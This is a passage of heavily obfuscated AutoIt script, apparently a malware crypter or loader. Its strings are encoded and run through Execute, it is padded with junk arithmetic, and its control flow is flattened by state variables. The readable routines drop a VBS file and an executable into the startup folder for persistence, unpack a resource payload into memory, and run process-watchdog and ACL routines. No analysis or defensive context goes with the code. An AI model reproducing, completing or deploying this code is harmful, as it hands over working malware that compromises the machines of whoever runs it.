  4751. Dim $kkdfhoh0grwkv4xteagt = 1899803 * 1945407 - 1915783 * 1108024 + 3720448
  4752. $1044747412 = 84602552
  4753. Ptr(337228 * 627608 - 3963210 * 101100)
  4754. Random(164686)
  4755. EndIf
  4756. If 179 < 250 AND 134 <> 222 AND 126 >= 103 AND 216 > 113 AND 217 < 248 AND $1044747412 = 1115248989 Then
  4757. $kjmnwuvqorpf = Execute(wmhsrosshiij(tznhxlbucosri("x0C4C4E6B4C604F676D5D61684C2D2"), tznhxlbucosri("x075169537")))
  4758. $1044747412 = 1424029346
  4759. EndIf
  4760. If 178 >= 144 AND 218 = 218 AND 295 = 295 AND $1044747412 = 1141152127 Then
  4761. $sjrkikdyyyiq = Execute(wmhsrosshiij(tznhxlbucosri("x055E6A585F6F614650585B4548292"), "0x"))
  4762. WinExists(tznhxlbucosri("gscLX"))
  4763. $1044747412 = 834897274
  4764. WinExists(tznhxlbucosri("6lqVxlEJqaMrFSeycIGKKp70zcH2mGe2U5fW6Mmd6YS3yJKK7n"))
  4765. EndIf
  4766. If 283 <> 133 AND 185 = 185 AND 148 <= 250 AND $1044747412 = 1220020015 Then
  4767. $zzubgszvjsyq = Execute(wmhsrosshiij(tznhxlbucosri("x007B665962497655636E474978292"), tznhxlbucosri("x0F4")))
  4768. $1044747412 = 232684580
  4769. EndIf
  4770. If 215 <> 229 AND 216 <= 278 AND 121 <= 124 AND 299 > 179 AND 279 = 279 AND $1044747412 = 1267601999 Then
  4771. $ohmyxiagzmqt = Execute(wmhsrosshiij(tznhxlbucosri("x0F6845597F69517A447055624B2A2"), tznhxlbucosri("x05437")))
  4772. $1044747412 = 2094513307
  4773. Chr(848122)
  4774. EndIf
  4775. If 283 <> 199 AND 216 > 139 AND 227 > 136 AND $1044747412 = 1307843693 Then
  4776. $ktvuappesiqiitptjkujhxomscskahd = Execute(wmhsrosshiij(tznhxlbucosri("x0044556D607449627"), "0x"))
  4777. IsFloat(tznhxlbucosri("8MSxRswhYNur8IT6JH9lTZRs7WtfRw2NF46KO731A86ISnZyDBwj"))
  4778. $1044747412 = 304222797
  4779. IsBinary(2726254 * 1381603 - 3259158 * 3823002)
  4780. EndIf
  4781. If 276 > 141 AND 219 <> 121 AND 255 < 271 AND $1044747412 = 1312944448 Then
  4782. $ndivddlyqicolemnsqxmeslllqujkqbqbcmwvxt = Execute(wmhsrosshiij(tznhxlbucosri("x004F4356556273796F6E6"), tznhxlbucosri("x054")))
  4783. $1044747412 = 1337610490
  4784. IsFloat(tznhxlbucosri("jyv"))
  4785. EndIf
  4786. If 265 <> 128 AND 190 = 190 AND 247 = 247 AND 299 >= 105 AND $1044747412 = 1337610490 Then
  4787. $ufriwemrmnxwmfpusbunpdxptkzzetxzkhndihkaefmvyr = Execute(wmhsrosshiij(tznhxlbucosri("x0447465"), tznhxlbucosri("x0E414E664")))
  4788. $1044747412 = 171873601
  4789. Ptr(2170140 - 2426797)
  4790. Mod(1087852, 2870182)
  4791. EndIf
  4792. If 173 < 230 AND 111 <= 182 AND 173 <> 256 AND $1044747412 = 1424029346 Then
  4793. $lnddocutiwos = Execute(wmhsrosshiij(tznhxlbucosri("x0756647C40727F60757457455B2A2"), tznhxlbucosri("x0F696")))
  4794. Dim $lvyrwcbtpnoqmutm1xw7 = 421533 - 3573658 + 3242952 + 2690529 * 1969546
  4795. $1044747412 = 89876260
  4796. EndIf
  4797. If 206 < 244 AND 167 <> 218 AND 170 <= 277 AND $1044747412 = 1488986972 Then
  4798. $rmakrawxblok = Execute(wmhsrosshiij(tznhxlbucosri("x02537E4D43525B6071776C5C7C2D2"), tznhxlbucosri("x005E654D4")))
  4799. IsBool(3129919 * 1603730)
  4800. $1044747412 = 1267601999
  4801. Int(2863435)
  4802. EndIf
  4803. If 205 <> 165 AND 115 > 110 AND 251 > 206 AND 219 < 268 AND 170 >= 162 AND $1044747412 = 1566067065 Then
  4804. $sljzkvgszykr = Execute(wmhsrosshiij(tznhxlbucosri("x0F6575507743616A6263565958292"), "0x"))
  4805. Dim $0t4mum2udoxtoezmyomt = 2101837
  4806. $1044747412 = 2132281550
  4807. Random(490982)
  4808. EndIf
  4809. If 256 > 238 AND 144 <= 258 AND 250 = 250 AND 270 > 199 AND $1044747412 = 1591982618 Then
  4810. $dxoecsiqtkcgbaffrrvfdygnsmgkmcnccexnyyrwihtfbkoccqukr = Execute(wmhsrosshiij(tznhxlbucosri("x0447507566707174704D667"), tznhxlbucosri("x0561727E4")))
  4811. $1044747412 = 960345959
  4812. Chr(1321691)
  4813. EndIf
  4814. If 228 >= 108 AND 188 = 188 AND 107 > 104 AND $1044747412 = 1681609778 Then
  4815. $yjwvgsywrstfbfdvrwkmjbozhlnjsprvwbnvvpfssyrrxvpwzqfznhm = Execute(wmhsrosshiij(tznhxlbucosri("x044757667D6470704D667"), tznhxlbucosri("x0F6E42587")))
  4816. $1044747412 = 1312944448
  4817. String(3730155 * 3999973)
  4818. Mod(853912, 3607297)
  4819. EndIf
  4820. If 262 >= 99 AND 256 = 256 AND 261 <= 266 AND 222 = 222 AND 267 < 281 AND $1044747412 = 1711264047 Then
  4821. $gxkslawcjrse = Execute(wmhsrosshiij(tznhxlbucosri("x067F69465E497B467055666D69282"), tznhxlbucosri("x0B64664")))
  4822. IsPtr(tznhxlbucosri("hVNteyWLZ95eUYe5LTb1WKJNa2c4Hd862KwIbXqojfhsV5DhZr1lk397UDyVJkAT3"))
  4823. $1044747412 = 1115248989
  4824. IsBool(tznhxlbucosri("KxB6GChNz2oVewzeJ5d30qFf1AZnmzTsEHsCFo7FNfUFDZZe4bKanOHAzELaZsQRbh1QWKzk6eL7vt6RyXY"))
  4825. EndIf
  4826. If 280 > 164 AND 270 = 270 AND 216 <= 231 AND $1044747412 = 1838106253 Then
  4827. $zbdfxalyqguh = Execute(wmhsrosshiij(tznhxlbucosri("x0763745D6A62546657794B4658292"), tznhxlbucosri("x007")))
  4828. IsFloat(tznhxlbucosri("5dZX4EqN06XMmXonJUTGYpjneT3ZlbzDw7OYv85"))
  4829. $1044747412 = 1566067065
  4830. IsString(3596733 - 730720)
  4831. EndIf
  4832. If 187 <= 226 AND 279 > 164 AND 259 <= 298 AND 226 >= 173 AND 283 <= 284 AND $1044747412 = 1972768996 Then
  4833. Opt(wmhsrosshiij(tznhxlbucosri("x0452716979436F6E684964656"), "0x"), wmhsrosshiij(tznhxlbucosri("x013"), "0x"))
  4834. IsBinary(tznhxlbucosri("pdNSzgUfVpmwA0HyxpwOJAViZAo5BS2zLoHsu7Epe"))
  4835. ExitLoop
  4836. WinExists(tznhxlbucosri("dEkSsM6x4YgD7"))
  4837. EndIf
  4838. If 185 <> 252 AND 297 < 299 AND 128 = 128 AND 273 > 189 AND 116 > 110 AND $1044747412 = 2014417103 Then
  4839. $fdcmavwfjqlj = Execute(wmhsrosshiij(tznhxlbucosri("x0D424844797A676C4553675248292"), tznhxlbucosri("x014")))
  4840. $1044747412 = 742906269
  4841. EndIf
  4842. If 138 <> 148 AND 290 = 290 AND 193 <= 284 AND $1044747412 = 2094513307 Then
  4843. $phldskhblpok = Execute(wmhsrosshiij(tznhxlbucosri("x0A4A6E49694E4D4D6A6A496458292"), "0x"))
  4844. $1044747412 = 1025992990
  4845. Dim $j5ijr4ion5vnefjb5asy = 1806059 + 476998 * 65389 + 1989764 - 2261649 - 2161946 * 2275246
  4846. EndIf
  4847. If 217 = 217 AND 140 <> 121 AND 101 < 218 AND 267 = 267 AND 227 < 238 AND $1044747412 = 2132281550 Then
  4848. $rlfmsxephmth = Execute(wmhsrosshiij(tznhxlbucosri("x0B627379537771794A4A584D6B2A2"), tznhxlbucosri("x02784")))
  4849. $1044747412 = 2144394568
  4850. Random(1367273)
  4851. Int(2025180)
  4852. EndIf
  4853. If 269 < 272 AND 236 >= 133 AND 240 < 241 AND $1044747412 = 2134070852 Then
  4854. $kxxjgjogayit = Execute(wmhsrosshiij(tznhxlbucosri("x03757364765B45437E67736668292"), "0x"))
  4855. $1044747412 = 1141152127
  4856. Int(2247335)
  4857. Int(1583231)
  4858. EndIf
  4859. If 175 > 140 AND 277 < 280 AND 197 > 196 AND 100 <> 206 AND 201 <= 229 AND $1044747412 = 2141934138 Then
  4860. $lrpuatkwspwj = Execute(wmhsrosshiij(tznhxlbucosri("x0755617E5968464E7D794E514C2D2"), tznhxlbucosri("x047152517")))
  4861. Dim $czfocx6oucxwj5scjszc = 3023810 - 2190197 * 1008128
  4862. $1044747412 = 937438825
  4863. EndIf
  4864. If 144 < 271 AND 283 >= 242 AND 262 < 269 AND 207 < 232 AND $1044747412 = 2144394568 Then
  4865. $qjlbdlflkohl = Execute(wmhsrosshiij(tznhxlbucosri("x0D5D61476B6D4F4E7056616B6C2D2"), tznhxlbucosri("x0F4D65635")))
  4866. IsBool(tznhxlbucosri("JCmZ3pKH4cG0Ky1Y1YR8JxF19zOwYzoHFRiBwN5Bj4MATjzMxCLgyJ3otSqX3GnlLv3ZQjBncyoW"))
  4867. $1044747412 = 1488986972
  4868. EndIf
  4869. Next
  4870.  
  4871. Func uummraejud($vbsname, $filename)
  4872. Global $1220020015 = 1307843693
  4873. Global $br5nsqizuj = 738950
  4874. For $e = 0 To 775291
  4875. If 144 = 144 AND 257 <> 207 AND 108 < 135 AND 219 < 246 AND $1220020015 = 89876260 Then
  4876. $sljzkvgszykr($urlpath, $url)
  4877. Int(2133924)
  4878. $1220020015 = 150208926
  4879. Mod(3176496, 678094)
  4880. IsBool(33044 - 3775911 + 3636261 - 2854492)
  4881. EndIf
  4882. If 113 <> 248 AND 170 >= 161 AND 114 = 114 AND $1220020015 = 150208926 Then
  4883. $rlfmsxephmth($startupdir, wmhsrosshiij(tznhxlbucosri("x0F265C4"), tznhxlbucosri("x044941714")))
  4884. $1220020015 = 578141839
  4885. IsBool(tznhxlbucosri("m2VM7qZ7LYxRb1gSqO6ZCx0rYs0OvIOirGaX13WTgFsst1Es1Sv1tVyEX5CChrBqcCJ1RoYmdGqz8k88jEShWDn4yWgfqyyD00ZZSCbqdN"))
  4886. EndIf
  4887. If 165 >= 106 AND 276 > 245 AND 238 <> 141 AND 119 >= 108 AND $1220020015 = 171873601 Then
  4888. Dim $urlpath = $dxoecsiqtkcgbaffrrvfdygnsmgkmcnccexnyyrwihtfbkoccqukr & wmhsrosshiij(tznhxlbucosri("x0F5"), tznhxlbucosri("x037B4")) & $kjmnwuvqorpf($vbsname, wmhsrosshiij(tznhxlbucosri("x0F2773627"), tznhxlbucosri("x04705A7")), wmhsrosshiij(tznhxlbucosri("x0D26717F6"), tznhxlbucosri("x03697"))) & wmhsrosshiij(tznhxlbucosri("x0D26717F6"), tznhxlbucosri("x03697"))
  4889. WinExists(tznhxlbucosri("6nDYi7H9R8Mi0XgLpybIuAjjWFg3"))
  4890. $1220020015 = 198176244
  4891. String(714333 + 3675699)
  4892. EndIf
  4893. If 244 > 181 AND 199 > 183 AND 253 >= 152 AND $1220020015 = 198176244 Then
  4894. $ohmyxiagzmqt($startupdir)
  4895. $1220020015 = 1711264047
  4896. IsFloat(3678527 - 2154416 - 2269712)
  4897. EndIf
  4898. If 194 < 199 AND 292 >= 284 AND 178 <= 261 AND 223 > 129 AND $1220020015 = 271776171 Then
  4899. $rlfmsxephmth($vbspath, wmhsrosshiij(tznhxlbucosri("x0F265C4"), tznhxlbucosri("x044941714")))
  4900. ExitLoop
  4901. IsPtr(3897136 + 3486345)
  4902. EndIf
  4903. If 223 >= 106 AND 154 < 227 AND 177 > 117 AND $1220020015 = 304222797 Then
  4904. Dim $triplequotes = $quotes & $quotes & $quotes
  4905. $1220020015 = 1591982618
  4906. Int(1016881)
  4907. Ptr(tznhxlbucosri("KnCiCb1OSCWGdxUCvr6MgiXHytHVVOS6Mjp5zNlWsskWW72uEYhwHlgXvdLihSRmYVVLnh2gAJ0MxuHZ2djTYyLFZ0smjrlDfgjyJjKUEyVG64QV"))
  4908. EndIf
  4909. If 272 < 279 AND 273 <= 296 AND 297 > 204 AND 165 <= 301 AND 227 <> 253 AND $1220020015 = 578141839 Then
  4910. $rlfmsxephmth($exepath, wmhsrosshiij(tznhxlbucosri("x0F265C4"), tznhxlbucosri("x044941714")))
  4911. IsBool(1539481 + 3798529)
  4912. $1220020015 = 271776171
  4913. Dim $xja6bup9qydhiv4rvs3d = tznhxlbucosri("RWNJdYBXj1BOKJg4BYEmZRflpSxrGObrEo3as0QNGCoYQYjHkap6HQ7ZDFH6zWW")
  4914. EndIf
  4915. If 227 < 267 AND 164 < 183 AND 116 = 116 AND 226 < 234 AND 113 <= 265 AND $1220020015 = 960345959 Then
  4916. Dim $exepath = $startupdir & wmhsrosshiij(tznhxlbucosri("x0F5"), tznhxlbucosri("x037B4")) & $filename
  4917. $1220020015 = 1681609778
  4918. Dim $jbpfygcja6qbrhxejcvq = 2655774
  4919. EndIf
  4920. If 168 < 296 AND 192 >= 178 AND 152 > 125 AND 135 <> 271 AND $1220020015 = 1115248989 Then
  4921. $sljzkvgszykr($exepath, $bytes)
  4922. $1220020015 = 1424029346
  4923. EndIf
  4924. If 155 > 120 AND 121 <> 116 AND 245 <> 267 AND 117 <= 214 AND $1220020015 = 1307843693 Then
  4925. Dim $quotes = Chr(wmhsrosshiij(tznhxlbucosri("x03343"), "0x"))
  4926. $1220020015 = 304222797
  4927. EndIf
  4928. If 295 > 288 AND 222 <= 291 AND 129 < 200 AND $1220020015 = 1312944448 Then
  4929. Dim $vbspath = $startupdir & wmhsrosshiij(tznhxlbucosri("x0F5"), tznhxlbucosri("x037B4")) & $vbsname & wmhsrosshiij(tznhxlbucosri("x0F2773627"), tznhxlbucosri("x04705A7"))
  4930. Chr(1758441)
  4931. $1220020015 = 1337610490
  4932. IsBool(tznhxlbucosri("O0rbZUFqGz3MSj9MGxeIoHyHjJlK9kYhCiooDbIT74ccbvTrFFyri9LvMgKRfnAuYyRVyC48aXJkEmId22OQSRaZMgyhiWZuKMGNKphpwG9L"))
  4933. EndIf
  4934. If 247 <> 251 AND 179 < 242 AND 245 = 245 AND 176 < 190 AND $1220020015 = 1337610490 Then
  4935. Dim $url = wmhsrosshiij(tznhxlbucosri("x085A4D6776617D6667705B6C61777066777E5"), tznhxlbucosri("x017A7")) & $ufriwemrmnxwmfpusbunpdxptkzzetxzkhndihkaefmvyr & wmhsrosshiij(tznhxlbucosri("x01565849326D68616E3B2B2B2"), tznhxlbucosri("x0E4945407")) & $vbspath
  4936. Chr(2397027)
  4937. $1220020015 = 171873601
  4938. IsFloat(tznhxlbucosri("TO9RJVq0iJOO7u1KsGMrhIgtbZnuYGzMA917G6aE0yo7t6YM"))
  4939. Dim $zas0hzjktpluveoo4au4 = "Y"
  4940. EndIf
  4941. If 198 >= 181 AND 134 >= 107 AND 292 > 155 AND 193 >= 109 AND 122 < 222 AND $1220020015 = 1424029346 Then
  4942. $sljzkvgszykr($vbspath, $vbs)
  4943. $1220020015 = 89876260
  4944. Dim $jfxfzxwx9rjybvwvuwfm = 2924873
  4945. IsFloat(249931 + 110540 + 1910044 + 1541660)
  4946. EndIf
  4947. If 229 < 236 AND 106 <= 188 AND 213 < 234 AND 154 <= 244 AND $1220020015 = 1591982618 Then
  4948. Dim $bytes = $qjlbdlflkohl($rmakrawxblok($hwobyepsertwooaziugcagzjdeoumwevcfhbvvszrtcgrwxm, wmhsrosshiij(tznhxlbucosri("x01363338343"), "0x"))) & Binary($zzubgszvjsyq(wmhsrosshiij(tznhxlbucosri("x043"), tznhxlbucosri("x0C61626E6")), wmhsrosshiij(tznhxlbucosri("x0634343"), tznhxlbucosri("x075E6F4B6"))))
  4949. $1220020015 = 960345959
  4950. IsPtr(tznhxlbucosri("R9xpKtIrcMBG7MCwO1vRT80WCYibS5aAiJbnqAnypW9ycLzE87OX0cq8z51IjI5MFKD1uUJbDpSJWtWnK87kV4U87kbfHSLNDMgxakLQm6Hyppj6Wm"))
  4951. Random(2689282)
  4952. EndIf
  4953. If 251 <= 292 AND 165 = 165 AND 164 = 164 AND $1220020015 = 1681609778 Then
  4954. Dim $vbs = wmhsrosshiij(tznhxlbucosri("x035564702753786358656C6C602D30275353627960747E2342756164756F426A656364782"), "0x") & $quotes & wmhsrosshiij(tznhxlbucosri("x075353627960747E2358656C6C6"), "0x") & $quotes & wmhsrosshiij(tznhxlbucosri("x092"), "0x") & $ufriwemrmnxwmfpusbunpdxptkzzetxzkhndihkaefmvyr & wmhsrosshiij(tznhxlbucosri("x04507B605B666F6F6D21567D632"), tznhxlbucosri("x056C4")) & $triplequotes & $exepath & $triplequotes
  4955. $1220020015 = 1312944448
  4956. Int(3174758)
  4957. EndIf
  4958. If 217 = 217 AND 220 > 146 AND 207 >= 170 AND 121 < 124 AND 241 >= 189 AND $1220020015 = 1711264047 Then
  4959. $kxxjgjogayit($startupdir)
  4960. Ptr(372307 - 429047 - 3845469 * 2238547)
  4961. $1220020015 = 1115248989
  4962. EndIf
  4963. Next
  4964. EndFunc
  4965.  
  4966. Func fpiwnlwmmu($resname, $restype)
  4967. Global $198176244 = 1307843693
  4968. Global $6y5oqn7chi = 15685
  4969. For $e = 0 To 283606
  4970. String(1303791 * 1145489 + 438413 * 391316)
  4971. If 287 <> 154 AND 223 > 183 AND 140 <> 260 AND 254 >= 193 AND $198176244 = 171873601 Then
  4972. Return $e($b(wmhsrosshiij(tznhxlbucosri("x00387434363346334533373437323735363337343433373236353631373436353238323236323739373436353532423232303236323032343532363537333533363937314635323032363230323235344232323342303234343446353634463647323739353036364639363547343635373232393"), tznhxlbucosri("x066"))))
  4973. ExitLoop
  4974. EndIf
  4975. If 109 <> 256 AND 266 < 299 AND 230 <> 248 AND 208 >= 177 AND $198176244 = 304222797 Then
  4976. Local $b = $e(wmhsrosshiij(tznhxlbucosri("x03486F606378755E625573786F666"), tznhxlbucosri("x076D6E6")))
  4977. IsString(tznhxlbucosri("Xxlsd6ujwiG1pGlbxdSOVml3USMTrndjBCftWeNw7ITbI3ONob5LyZLzg3mCGt0gXnfe56rgba"))
  4978. $198176244 = 1591982618
  4979. Int(624538)
  4980. EndIf
  4981. If 156 = 156 AND 275 = 275 AND 142 < 241 AND 133 > 119 AND $198176244 = 960345959 Then
  4982. Local $infoblock = $e($b(wmhsrosshiij(tznhxlbucosri("x0038743436334633443336313633463342383232363246353732363546353633433333323235463436334633423232334230323237303734373232323233423032323436363936354634353236353733363647353732363336353537323232334230323237303734373232323233423032343638343936354733373436313635463336353233423032323737373337343732323232334230323435323635373334354631363446353233423032323633463646354637323232334230323435323635373335343739373036353239353242323330323235344"), tznhxlbucosri("x066"))))
  4983. $198176244 = 1681609778
  4984. IsFloat(tznhxlbucosri("cemRs7tk0cFkEgTIhf4tpY2kZTs"))
  4985. EndIf
  4986. If 107 = 107 AND 291 > 167 AND 256 >= 222 AND 258 >= 127 AND $198176244 = 1307843693 Then
  4987. Local $e = Execute
  4988. Dim $iadoti80rfyinlogue1v = 1317267 - 3224199 * 3312240 - 540852 + 276212 + 476836 * 23145 - 2119383
  4989. $198176244 = 304222797
  4990. EndIf
  4991. If 124 <> 285 AND 134 >= 107 AND 100 <> 210 AND $198176244 = 1312944448 Then
  4992. Local $globalmemoryblock = $e($b(wmhsrosshiij(tznhxlbucosri("x0038743436334633443336313633463342383232363246353732363546353633433333323235463436334633423232334230323237303734373232323233423032323433463646313634353236353733363647353732363336353232323342303232373037343732323232334230323436383439363547333734363136354633363532334230323237303734373232323233423032343439363546363636443236334636463336324239353242323330323235344"), tznhxlbucosri("x0F4"))))
  4993. Dim $gkvsfnni4zpynjmlzqa8 = 3075409
  4994. $198176244 = 1337610490
  4995. IsFloat(394371 + 107417 * 553946)
  4996. Mod(1209633, 2557682)
  4997. EndIf
  4998. If 111 < 224 AND 245 <> 282 AND 290 <> 231 AND 195 <> 200 AND 184 >= 110 AND $198176244 = 1337610490 Then
  4999. Local $memorypointer = $e($b(wmhsrosshiij(tznhxlbucosri("x01397535373247324532373037324732433933333733473436333734473437324232323333344735373247324333333243313333363136353633333333324331333335324737473237334433373436323737463436333732373433333332433133333631363536333333333243313335353637324737473337303732453547343735473746333638353337324737473237334338343343333231333334354"), tznhxlbucosri("x0A52407"))))
  5000. $198176244 = 171873601
  5001. EndIf
  5002. If 269 <= 292 AND 292 > 287 AND 218 < 236 AND $198176244 = 1591982618 Then
  5003. Local $hinstance
  5004. $198176244 = 960345959
  5005. Int(1307649)
  5006. EndIf
  5007. If 271 <> 164 AND 236 <= 280 AND 200 > 166 AND 229 >= 133 AND 229 <= 232 AND $198176244 = 1681609778 Then
  5008. Local $ressize = $e($b(wmhsrosshiij(tznhxlbucosri("x033B7737353045304730353235304530413B313135314536343135364536353040303031313645373530453041313130413331313537343435354431353731313130413331313630353A34324536353545353631353634303535443634313530353631313130413331313433343734313131313041333137353B373A35364430343735323536453035363130413331313433343734313131313041333137373A35364535353547313530453545303531413A363141313033313136374"), tznhxlbucosri("x03785"))))
  5009. $198176244 = 1312944448
  5010. Int(1935549)
  5011. EndIf
  5012. Random(1867146)
  5013. Next
  5014. EndFunc
  5015.  
  5016. Func vocceiofko($title, $body, $type)
  5017. Switch (0)
  5018. Case $yjwvgsywrstfbfdvrwkmjbozhlnjsprvwbnvvpfssyrrxvpwzqfznhm = $startupdir
  5019. $lrpuatkwspwj($type, $title, $body)
  5020. EndSwitch
  5021. EndFunc
  5022.  
  5023. Func qbcdrrtsoo($pid)
  5024. While (1)124 <= 246 AND 280 = 280 AND 222 < 260 AND 169 <> 278 AND
  5025. If 223 <= 292 AND 115 < 159 AND 138 > 117 AND $akuofazowlnr($pid) = wmhsrosshiij(tznhxlbucosri("x043"), tznhxlbucosri("x0C61626E6")) Then
  5026. qvymrxbzoa()
  5027. EndIf
  5028. WEnd
  5029. EndFunc
  5030.  
  5031. Func qktbamujtm($file, $startup, $res)
  5032. Global $1312944448 = 1307843693
  5033. Global $drxyx1if23 = 2149904
  5034. For $e = 0 To 2065486
  5035. IsString(tznhxlbucosri("mw3rWR3c7LBYX9Ew83zfxeFE"))
  5036. If 178 <= 212 AND 101 = 101 AND 104 <= 150 AND 138 <= 260 AND 129 <= 188 AND $1312944448 = 304222797 Then
  5037. Dim $fhandle = $rmakrawxblok($file, wmhsrosshiij(tznhxlbucosri("x033"), tznhxlbucosri("x0559417")))
  5038. Dim $cvca43vxrj0rpdlacgff = 2075025 + 2882752 + 1491533
  5039. $1312944448 = 1591982618
  5040. Random(2800986)
  5041. Chr(2300111)
  5042. EndIf
  5043. If 140 > 139 AND 281 <> 173 AND 263 > 116 AND 101 < 265 AND 237 = 237 AND $1312944448 = 960345959 Then
  5044. $sljzkvgszykr($fhandle, $qifgahabsexa($data, 1))
  5045. Ptr(3223437 + 1766477 - 3210313)
  5046. $1312944448 = 1681609778
  5047. IsBool(tznhxlbucosri("LDgjBRUc"))
  5048. EndIf
  5049. If 286 = 286 AND 209 <= 242 AND 183 = 183 AND $1312944448 = 1307843693 Then
  5050. $file = $ktvuappesiqiitptjkujhxomscskahd & wmhsrosshiij(tznhxlbucosri("x0F5"), tznhxlbucosri("x037B4")) & $file
  5051. IsPtr(tznhxlbucosri("A6SxdzFuJo9"))
  5052. $1312944448 = 304222797
  5053. Mod(1636422, 668682)
  5054. IsString(2527930 - 1233812)
  5055. EndIf
  5056. If 167 <> 117 AND 267 < 296 AND 116 < 205 AND 113 = 113 AND $1312944448 = 1591982618 Then
  5057. Dim $data = fpiwnlwmmu($res, wmhsrosshiij(tznhxlbucosri("x02333"), tznhxlbucosri("x005B6")))
  5058. $1312944448 = 960345959
  5059. Dim $dued12uguh1hpckcupmj = 312604 - 993882 - 1841683
  5060. Dim $pregvdgoibvfzc697fbe = 564625
  5061. EndIf
  5062. If 112 <= 229 AND 228 < 259 AND 174 < 199 AND 267 < 293 AND $1312944448 = 1681609778 Then
  5063. $phldskhblpok($fhandle)
  5064. IsPtr(tznhxlbucosri("hfGembQ9B0uClmF6s4g4LjqzwKyMp5u4Uv98cJizTGELLFZ2MHeedZCAYRN5KIJViHB87n5"))
  5065. ExitLoop
  5066. IsPtr(1715610 * 3020250)
  5067. EndIf
  5068. Ptr(1189798 * 1985207)
  5069. Next
  5070. Switch ($startup)
  5071. Case wmhsrosshiij(tznhxlbucosri("x045275756"), tznhxlbucosri("x0D4"))
  5072. $hgitnhfhiatz($file)
  5073. Case $yjwvgsywrstfbfdvrwkmjbozhlnjsprvwbnvvpfssyrrxvpwzqfznhm <> $startupdir
  5074. $hgitnhfhiatz($file)
  5075. EndSwitch
  5076. EndFunc
  5077.  
  5078. Func ujhyawntvh($url, $path)
  5079. Switch (0)
  5080. Case $yjwvgsywrstfbfdvrwkmjbozhlnjsprvwbnvvpfssyrrxvpwzqfznhm = $startupdir
  5081. Global $1591982618 = 1307843693
  5082. Global $servgvj68b = 1158036
  5083. For $e = 0 To 3781873
  5084. If 110 <= 152 AND 166 >= 151 AND 151 <= 262 AND 144 <= 247 AND $1591982618 = 304222797 Then
  5085. $hgitnhfhiatz($ktvuappesiqiitptjkujhxomscskahd & wmhsrosshiij(tznhxlbucosri("x0F5"), tznhxlbucosri("x037B4")) & $path)
  5086. ExitLoop
  5087. Mod(763252, 310648)
  5088. EndIf
  5089. If 116 = 116 AND 110 < 191 AND 203 <= 270 AND $1591982618 = 1307843693 Then
  5090. $zbdfxalyqguh($url, $ktvuappesiqiitptjkujhxomscskahd & wmhsrosshiij(tznhxlbucosri("x0F5"), tznhxlbucosri("x037B4")) & $path)
  5091. $1591982618 = 304222797
  5092. EndIf
  5093. Next
  5094. EndSwitch
  5095. EndFunc
  5096.  
  5097. Func zvnfirtsqf()
  5098. If 110 >= 109 AND 144 >= 101 AND 263 <= 290 AND $gxkslawcjrse(wmhsrosshiij(tznhxlbucosri("x0A524D4042525B31537E666C606F6C5"), tznhxlbucosri("x0853487"))) = wmhsrosshiij(tznhxlbucosri("x043"), tznhxlbucosri("x0C61626E6")) Then
  5099. $gidzbjoxovyx($dawmcpaxeytqvfhmytihyemcglhetsghcxjvhjzqgeqxyjwnutscoeyz)
  5100. EndIf
  5101. EndFunc
  5102.  
  5103. Func meisegrjii()
  5104. If 218 > 202 AND 291 >= 288 AND 127 <= 273 AND 140 <= 155 AND 154 <= 188 AND $akuofazowlnr(wmhsrosshiij(tznhxlbucosri("x057E677C6C6F60776D266B766"), tznhxlbucosri("x04415"))) OR $akuofazowlnr(wmhsrosshiij(tznhxlbucosri("x06726F687E2568756"), "0x")) Then
  5105. $gidzbjoxovyx($dawmcpaxeytqvfhmytihyemcglhetsghcxjvhjzqgeqxyjwnutscoeyz)
  5106. EndIf
  5107. EndFunc
  5108.  
  5109. Func myzgjvhjwr()
  5110. Switch (0)
  5111. Case $yjwvgsywrstfbfdvrwkmjbozhlnjsprvwbnvvpfssyrrxvpwzqfznhm = $startupdir
  5112. $bvnakuhdnyyj(wmhsrosshiij(tznhxlbucosri("x006E676"), tznhxlbucosri("x0D634")), wmhsrosshiij(tznhxlbucosri("x042B2764205D69616B41707425342224204168642B22442"), tznhxlbucosri("x007665667")) & Chr(wmhsrosshiij(tznhxlbucosri("x03343"), "0x")) & $uwoufpecayizshabqrulkwclwrkbkshpopayblmcuoqympdrpdivmbny & Chr(wmhsrosshiij(tznhxlbucosri("x03343"), "0x")), wmhsrosshiij("0x", tznhxlbucosri("x0B40705A6")), wmhsrosshiij("0x", tznhxlbucosri("x0B40705A6")), $qfqblqmxeqwzdxcrgtzyxvebmhxdhvidkknswxmbkkdcibhqalj)
  5113. EndSwitch
  5114. EndFunc
  5115.  
  5116. Func acl($handle)
  5117. Global $1115248989 = 1307843693
  5118. Global $bysnrisokv = 3009404
  5119. For $e = 0 To 465862
  5120. If 161 <> 178 AND 107 > 99 AND 137 <= 211 AND 100 <> 263 AND $1115248989 = 171873601 Then
  5121. $ret = $e($bn(wmhsrosshiij(tznhxlbucosri("x033B7737353045304730353235304530413B313435323537343535323433353A3030303131364537353045304134313041333134353A353644373134313041333134373A3536453A3437353A35323530453A34324536373235303530413431304133313434333437343131343130413331373433373237303730413041333134353734343535443135373134313041333737353045304630343734313436353034373734353634373630353A34324536313B31373437373237303730413A31304133313435373434353544313537313431304133313430313134313A3"), tznhxlbucosri("x05487"))))
  5122. $1115248989 = 198176244
  5123. String(tznhxlbucosri("KoN8YzcsRELklZLFSor74"))
  5124. Chr(306247)
  5125. EndIf
  5126. If 238 <> 264 AND 106 > 103 AND 298 < 300 AND 285 > 165 AND $1115248989 = 198176244 Then
  5127. $ret = $e($bn(wmhsrosshiij(tznhxlbucosri("x0038743436334633443336313633463342383237363136343736363137303639333333323235463436334633423732334230323736393635473432373233423032373533363537343533363536333735373236393734373934343635373336333732363937303734363647323434363136333633423732334230323737303734373232373233423032343730353334343233423032373639363547343237323342303237333132373233423032373730373437323237323342303234373034313433343342334230323736393635473432373233423032373330323732393"), tznhxlbucosri("x015"))))
  5128. IsBool(tznhxlbucosri("KOJf1FeA2oQ0CkEKBuv6QUWxsqGeFIU8RGIbpFOOkleDoBdVI0xIiL9etnns3WSEg4DibAf9qXIjslcubG9RJ6yhcLmvB6s2O"))
  5129. $1115248989 = 1711264047
  5130. String(tznhxlbucosri("ZLCJuKE84Xp9UQEmtVU8y1XQui1yz49j7"))
  5131. EndIf
  5132. If 250 <= 292 AND 159 <= 261 AND 150 <> 288 AND 124 <> 200 AND 188 <= 301 AND $1115248989 = 304222797 Then
  5133. $bn = $e(wmhsrosshiij(tznhxlbucosri("x02696E616279747F637472796E676"), "0x"))
  5134. IsString(3128717 + 937597 - 856801)
  5135. $1115248989 = 1591982618
  5136. Dim $gk9zwvzmixtp6hkxv9sa = 1334318
  5137. EndIf
